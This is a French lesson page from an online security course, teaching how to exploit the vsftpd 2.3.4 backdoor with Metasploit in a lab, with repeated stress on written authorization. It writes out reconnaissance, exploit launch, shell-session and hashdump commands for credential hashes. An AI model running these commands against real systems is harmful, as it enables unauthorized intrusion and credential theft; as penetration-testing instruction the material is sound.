Exploiter une vulnérabilité connue
Utilisez un module d’exploitation contre une cible vulnérable dans un laboratoire et interprétez la sortie de session.
Exploiter une vulnérabilité connue est une leçon Cyber Security Academy gratuite sur CoddyKit. Ceci est la leçon 2 sur 4. Tu peux lire la leçon complète ci-dessous gratuitement — puis la pratiquer en direct dans le navigateur avec un éditeur de code intégré et un tuteur IA 24/7. Elle fait partie du parcours d'apprentissage Cyber Security Academy, et ta progression se synchronise sur le web et l'application CoddyKit. Le cours Cyber Security Academy comprend 4 leçons au total.
Éthique et autorisation d’abord
L’exploitation n’est légale que contre des systèmes dont vous êtes propriétaire ou pour lesquels vous disposez d’une autorisation écrite explicite. Tous les exemples présentés ici concernent des environnements de laboratoire autorisés. L’exploitation non autorisée constitue une infraction pénale.
Recommandation pour le laboratoire
Utilisez des machines virtuelles volontairement vulnérables : Metasploitable2/3, DVWA, des machines VulnHub, ou HackTheBox/TryHackMe pour vous exercer légalement. N’évaluez jamais des systèmes de production ou des systèmes réels sans document de périmètre signé.
# Download Metasploitable2
# https://sourceforge.net/projects/metasploitable/
# Or use VulnHub
# https://www.vulnhub.com/
# Network: host-only adapter (isolated)Reconnaissance avant l’exploitation
Effectuez toujours un recensement avant d’exploiter. Connaissez la version exacte du service, le système d’exploitation et le contexte avant de sélectionner un code d’exploitation. Une version incorrecte signifie un échec de l’exploitation ou un plantage du système.
sudo nmap -sV -O 192.168.1.100
# Identify:
# - OS version
# - Service + exact version
# - Open ports
# Then search Metasploit for matching exploitSélectionner le bon code d’exploitation
Recherchez par nom et version du service. Privilégiez les modules classés Excellent ou Très bon. Lisez info pour confirmer que la plateforme cible et la plage de versions correspondent.
msf6 > search vsftpd 2.3.4
# exploit/unix/ftp/vsftpd_234_backdoor
# Rank: Excellent
msf6 > info exploit/unix/ftp/vsftpd_234_backdoorConfigurer et exécuter le code d’exploitation
Définissez RHOSTS (cible distante), LHOST (votre IP pour les connexions inversées) et LPORT (port d’écoute), sélectionnez une charge utile, puis lancez-la. Surveillez la création d’une session ou l’apparition de messages d’erreur.
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 > set RHOSTS 192.168.1.100
msf6 > set payload cmd/unix/interact
msf6 > run
# [*] Command shell session 1 openedInterpréter les résultats
Une exploitation réussie ouvre une session. Les exploitations échouées affichent des messages d’erreur : connexion refusée (port non ouvert), échec de l’exploitation (version incorrecte), aucune session créée (la charge utile n’a pas réussi à se connecter en retour).
# Success:
[*] Started reverse TCP handler
[*] Command shell session 1 opened
# Failure:
[-] Exploit aborted: Bad return value from check
[-] Exploit failed: No session was createdInteragir avec une session
Après l’exploitation, interagissez avec la session à l’aide de sessions -i . Les sessions d’interpréteur de commandes de base fournissent un terminal ; les sessions Meterpreter offrent une interface de programmation complète.
msf6 > sessions # list all sessions
msf6 > sessions -i 1 # interact with session 1
# Once inside:
id
whoami
ifconfig
uname -aMettre en arrière-plan et gérer plusieurs sessions
Appuyez sur Ctrl+Z pour mettre une session en arrière-plan et revenir à msfconsole. Vous pouvez ainsi gérer plusieurs sessions ou exécuter des modules d’après-exploitation sur une session précise.
# Background active session
Ctrl+Z
# List sessions
msf6 > sessions
# Run post module against session 1
msf6 > use post/linux/gather/hashdump
msf6 > set SESSION 1
msf6 > runCommande de vérification
De nombreux modules d’exploitation proposent une commande check qui vérifie si la cible est vulnérable sans réellement l’exploiter. Exécutez toujours la vérification en premier lorsqu’elle est disponible.
msf6 exploit(ms17_010_eternalblue) > check
# [+] 192.168.1.100:445 - The target is vulnerable.
# Or:
# [-] 192.168.1.100:445 - The target is not vulnerable.Considérations relatives à la fiabilité des exploitations
Les codes d’exploitation peuvent faire planter des services, déclencher des alertes ou laisser des journaux. Lors des évaluations en production, planifiez les exploitations pendant les périodes de faible trafic, prévoyez un plan de retour arrière et vérifiez que des sauvegardes existent avant toute opération destructive.
Documenter l’exploitation
Consignez l’horodatage, l’IP et le port de la cible, le module d’exploitation utilisé, le numéro de CVE, la charge utile utilisée, la session obtenue ainsi que les éléments probants (capture d’écran ou sortie du terminal). Il s’agit de la preuve de la vulnérabilité à inclure dans le rapport.
Vérification rapide
Que fait la commande « check » de Metasploit ?
Résumé : exploiter les vulnérabilités
Une exploitation éthique suit un déroulement clair : obtenir une autorisation écrite, effectuer un recensement attentif, sélectionner le code d’exploitation correspondant, consulter les informations du module, lancer la vérification en premier lorsqu’elle est disponible, exécuter l’exploitation et tout documenter. N’exploitez jamais un système sans autorisation : la compétence technique et la limite éthique sont indissociables.
Questions Fréquemment Posées
La leçon « Exploiter une vulnérabilité connue » est-elle gratuite ?
Oui — le texte complet de « Exploiter une vulnérabilité connue » est gratuit à lire ici sur le web. Pour la pratiquer de manière interactive (un éditeur de code intégré et un tuteur IA 24/7) et déverrouiller le reste du cours Cyber Security Academy, passe à CoddyKit PRO. Le cours Cyber Security Academy comprend 4 leçons au total.
Qu'est-ce que j'apprendrai dans « Exploiter une vulnérabilité connue » ?
Utilisez un module d’exploitation contre une cible vulnérable dans un laboratoire et interprétez la sortie de session. Tu pratiques Cyber Security Academy avec du code pratique que tu exécutes directement dans le navigateur, et un tuteur IA 24/7 répond à tes questions au fur et à mesure que tu avances dans la leçon.
Dois-je avoir de l'expérience pour commencer Cyber Security Academy ?
Aucune expérience préalable n'est requise. Cyber Security Academy sur CoddyKit est structuré pour les débutants jusqu'aux apprenants avancés, donc tu peux commencer ici ou depuis le début et avancer à ton rythme. Ceci est la leçon 2 sur 4.
Combien de temps prend la leçon « Exploiter une vulnérabilité connue » ?
La plupart des leçons CoddyKit prennent environ 5–10 minutes. Chacune est courte et interactive, tu progresses régulièrement et tu repiques exactement où tu t'es arrêté sur le web et l'app.
Peux-tu écrire et exécuter du code dans cette leçon Cyber Security Academy ?
Oui. Chaque leçon Cyber Security Academy inclut un éditeur de code intégré, tu écris et exécutes du vrai code directement dans ton navigateur et tu reçois des retours IA instantanés — aucune configuration locale requise.
Toutes les leçons de ce cours
- Architecture de Metasploit et msfconsole
- Exploiter une vulnérabilité connue
- Charges utiles : avec ou sans étapes, Meterpreter
- Après l’exploitation : pivoter et persister